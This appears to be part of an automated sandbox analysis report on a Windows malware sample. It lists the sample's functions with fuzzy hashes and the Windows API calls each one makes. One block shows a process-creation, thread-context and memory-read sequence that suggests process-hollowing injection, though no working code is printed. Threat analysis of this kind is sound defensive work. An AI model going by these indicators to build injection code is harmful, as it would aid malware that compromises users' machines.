                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e5ed285417a0cdbfd11ac74974dc9cf313cadad0360da983f5272b8c37c2a58d
                                                                                                                • Instruction ID: f0509574e798ad344c7e7cae87b481d79289d5c2380afa09f0d18a24c595225d
                                                                                                                • Opcode Fuzzy Hash: e5ed285417a0cdbfd11ac74974dc9cf313cadad0360da983f5272b8c37c2a58d
                                                                                                                • Instruction Fuzzy Hash: 09F13B716083419FCB54DF28C480A6ABBE6FF88324F54892EF8999B351D734E945CF92
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00604370
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00604415
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00604432
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1505330794-0
                                                                                                                • Opcode ID: 75af74b97234dec7f24bc28ad507773e2439f1047b5c8b1e7ec5f336886e41fd
                                                                                                                • Instruction ID: b00ceb686a7df36dd1932e0e86a013b6fce3d72b7a4ccb4ed57752b901bc9900
                                                                                                                • Opcode Fuzzy Hash: 75af74b97234dec7f24bc28ad507773e2439f1047b5c8b1e7ec5f336886e41fd
                                                                                                                • Instruction Fuzzy Hash: 753181B05057019FD734DF24D884AABBBF9FB58308F00092EE69AC2391DB74A944CB92
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00625733
                                                                                                                  • Part of subcall function 0062A16B: __NMSG_WRITE.LIBCMT ref: 0062A192
                                                                                                                  • Part of subcall function 0062A16B: __NMSG_WRITE.LIBCMT ref: 0062A19C
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 0062573A
                                                                                                                  • Part of subcall function 0062A1C8: GetModuleFileNameW.KERNEL32(00000000,006C33BA,00000104,?,00000001,00000000), ref: 0062A25A
                                                                                                                  • Part of subcall function 0062A1C8: ___crtMessageBoxW.LIBCMT ref: 0062A308
                                                                                                                  • Part of subcall function 0062309F: ___crtCorExitProcess.LIBCMT ref: 006230A5
                                                                                                                  • Part of subcall function 0062309F: ExitProcess.KERNEL32 ref: 006230AE
                                                                                                                  • Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28
                                                                                                                • RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: 8df9d8460d53950250b97de09a54bd1d63d78f227d9e2e3cb94fe026f14c94d1
                                                                                                                • Instruction ID: 4efd93095ff50f377deb52a853712fea890f133fbded7732e108f53f459da191
                                                                                                                • Opcode Fuzzy Hash: 8df9d8460d53950250b97de09a54bd1d63d78f227d9e2e3cb94fe026f14c94d1
                                                                                                                • Instruction Fuzzy Hash: D201D231280F31DEDA602774FC46A6A634B8B42762F10052DF4069B381DFB489014E66
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00669548,?,?,?,?,?,00000004), ref: 006698BB
                                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00669548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006698D1
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00669548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006698D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
                                                                                                                • Instruction ID: 76f2e33c35a205b03de8308a8da307d26c994fa82a04c0de3809184b0ade2ddf
                                                                                                                • Opcode Fuzzy Hash: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
                                                                                                                • Instruction Fuzzy Hash: 5FE08632140214B7D7212B54EC0DFDA7B1AEB06760F104220FB54A91E087B1152197D8
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00668D1B
                                                                                                                  • Part of subcall function 00622D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00629A24), ref: 00622D69
                                                                                                                  • Part of subcall function 00622D55: GetLastError.KERNEL32(00000000,?,00629A24), ref: 00622D7B
                                                                                                                • _free.LIBCMT ref: 00668D2C
                                                                                                                • _free.LIBCMT ref: 00668D3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                • Instruction ID: 55979ae11ea4b1904e2e5d704245e3fd4fca128c1ff782ed924aeb25618f100c
                                                                                                                • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                • Instruction Fuzzy Hash: F7E012B1601A125BCB64A678B950AD313DE8F9C3527140E1DF50DD7286CE64FC528578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
                                                                                                                • Opcode ID: df1966ff927690a8e43ff1e3236997cd78fb5a76714a836b1625987f62f07df7
                                                                                                                • Instruction ID: ef020f3b19de82306b9e48254fd504e49486df18e6aeb6bd54b48fdad23feed9
                                                                                                                • Opcode Fuzzy Hash: df1966ff927690a8e43ff1e3236997cd78fb5a76714a836b1625987f62f07df7
                                                                                                                • Instruction Fuzzy Hash: 40225770648301DFDB28DF54C494A6BB7E2BF84344F15896DE88A8B3A2D731EC45CB86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                • Instruction ID: a74a1109f3ec8b71dcced8f8f6680f09dbd9f4631e4b4314b326784b87d453b1
                                                                                                                • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                • Instruction Fuzzy Hash: 7C3184B1B44506AFC708DF68D891E6AB3A6FF483107158629E519CB3D1EB30F951CB90
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 00604834
                                                                                                                  • Part of subcall function 0062336C: __lock.LIBCMT ref: 00623372
                                                                                                                  • Part of subcall function 0062336C: DecodePointer.KERNEL32(00000001,?,00604849,00657C74), ref: 0062337E
                                                                                                                  • Part of subcall function 0062336C: EncodePointer.KERNEL32(?,?,00604849,00657C74), ref: 00623389
                                                                                                                  • Part of subcall function 006048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00604915
                                                                                                                  • Part of subcall function 006048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0060492A
                                                                                                                  • Part of subcall function 00603B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B68
                                                                                                                  • Part of subcall function 00603B3A: IsDebuggerPresent.KERNEL32 ref: 00603B7A
                                                                                                                  • Part of subcall function 00603B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C52F8,006C52E0,?,?), ref: 00603BEB
                                                                                                                  • Part of subcall function 00603B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00603C6F
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00604874
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1438897964-0
                                                                                                                • Opcode ID: 320a65458169786f7ea101c48b63fc78c60f9b8203479a4aee8c671ef94c6290
                                                                                                                • Instruction ID: 112919fa3e3d403243adc91b8b30dfde8313fd6957d1a3bceda3bae24b03cc1b
                                                                                                                • Opcode Fuzzy Hash: 320a65458169786f7ea101c48b63fc78c60f9b8203479a4aee8c671ef94c6290
                                                                                                                • Instruction Fuzzy Hash: F9119DB19087519FC714EF28EC0591ABBEAEF94750F108A1EF441832B1DB749A49CB9A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0062571C: __FF_MSGBANNER.LIBCMT ref: 00625733
                                                                                                                  • Part of subcall function 0062571C: __NMSG_WRITE.LIBCMT ref: 0062573A
                                                                                                                  • Part of subcall function 0062571C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F
                                                                                                                • std::exception::exception.LIBCMT ref: 00620DEC
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00620E01
                                                                                                                  • Part of subcall function 0062859B: RaiseException.KERNEL32(?,?,?,006B9E78,00000000,?,?,?,?,00620E06,?,006B9E78,?,00000001), ref: 006285F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: 50bd50cacb44c20e58d3681b4f934c7ed68be72ab6ae074ce29d201efb9900eb
                                                                                                                • Instruction ID: e882cc557687aa2baa730f3bf8150f9fba41233d57acbfbea734c1f3ac2301f6
                                                                                                                • Opcode Fuzzy Hash: 50bd50cacb44c20e58d3681b4f934c7ed68be72ab6ae074ce29d201efb9900eb
                                                                                                                • Instruction Fuzzy Hash: 76F0F935402A3A7ADB10BA94FC215DE7BAE9F00310F004819F90497682DF709A94CAD5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_file_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 26237723-0
                                                                                                                • Opcode ID: e83fac7f73f177b028bbb88d159835751d44c0d7f1e7883adda404861c3abb56
                                                                                                                • Instruction ID: 75f55a0502fdb6c8d50c20004bfb2871ad740f6c8ab300293e999d4fbb807f13
                                                                                                                • Opcode Fuzzy Hash: e83fac7f73f177b028bbb88d159835751d44c0d7f1e7883adda404861c3abb56
                                                                                                                • Instruction Fuzzy Hash: FC01D471801E28AFCF72AF68BC028DE7B63AF91361F404119F8241B2A1DB318A51DF95
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28
                                                                                                                • __lock_file.LIBCMT ref: 006253EB
                                                                                                                  • Part of subcall function 00626C11: __lock.LIBCMT ref: 00626C34
                                                                                                                • __fclose_nolock.LIBCMT ref: 006253F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 8ee4cad98bae9b35ec00c05576db4bb0b78dc8c431629976dd8a38964cf8c0fc
                                                                                                                • Instruction ID: 1ff1c70a14d719891cccaf52fb19736b4bdb8b7e4d43fc4ba5accb3913403f2e
                                                                                                                • Opcode Fuzzy Hash: 8ee4cad98bae9b35ec00c05576db4bb0b78dc8c431629976dd8a38964cf8c0fc
                                                                                                                • Instruction Fuzzy Hash: B2F0F631802E209EDB60BB64BC017ED66E26F41374F20810CE421AB1C1DBBC49415F59
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016437BB
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01643851
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01643873
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                • Instruction ID: 5bc2a8fdf9de19416ab5534cff1c7fc803d578fc57cad5e69bcb503a2bf60eab
                                                                                                                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                • Instruction Fuzzy Hash: 7312CD24E24658C7EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: 655e0ff491d1daf99290ba609769d0f3e661bc6a9b982cba353b84ac26e937e9
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: 6631D4B0B005159BE718DF58E4849A9F7A6FB59300B6487A5E80ACB352D731EDC1DFC0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 2819b0e6571293c0184ff43193c013e4b761c76e0f5239989d7e55a83e21d9ba
                                                                                                                • Instruction ID: 60fe882153155c7fb15eb918d5adf1e8989bb9f465f93941a49e283bfb0527c5
                                                                                                                • Opcode Fuzzy Hash: 2819b0e6571293c0184ff43193c013e4b761c76e0f5239989d7e55a83e21d9ba
                                                                                                                • Instruction Fuzzy Hash: 764138745443519FDB18DF14C448B5ABBE2BF45318F0988ACE8998B7A2C371EC45CF52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 99f5eec6508beeb5fd9eba17d2f564fa1264fed6861514bcd76dc85e2acc4a94
                                                                                                                • Instruction ID: a49fd08325e455163e88ce67987edec61aa4207195d10e01f4a3861f8df7c1e8
                                                                                                                • Opcode Fuzzy Hash: 99f5eec6508beeb5fd9eba17d2f564fa1264fed6861514bcd76dc85e2acc4a94
                                                                                                                • Instruction Fuzzy Hash: 2F2163B2A04A09EBDB148F21E8417AE7BF6FF14350F21856EE896C51D0EB31D1D0CBA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00604BEF
                                                                                                                  • Part of subcall function 0062525B: __wfsopen.LIBCMT ref: 00625266
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E0F
                                                                                                                  • Part of subcall function 00604B6A: FreeLibrary.KERNEL32(00000000), ref: 00604BA4
                                                                                                                  • Part of subcall function 00604C70: _memmove.LIBCMT ref: 00604CBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1396898556-0
                                                                                                                • Opcode ID: 5bc4dceaeabb64479539e94a6653ed7e22fb2ea1d446672807cdcc6a383241e6
                                                                                                                • Instruction ID: b5695db0a7c3f14647e13b10df83a561d40cc44de510f904caa6a13d908d16aa
                                                                                                                • Opcode Fuzzy Hash: 5bc4dceaeabb64479539e94a6653ed7e22fb2ea1d446672807cdcc6a383241e6
                                                                                                                • Instruction Fuzzy Hash: C711C171680205ABCF38AF70C812FAE77AAAF84750F10882DF642A71C1DF719A019B94
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
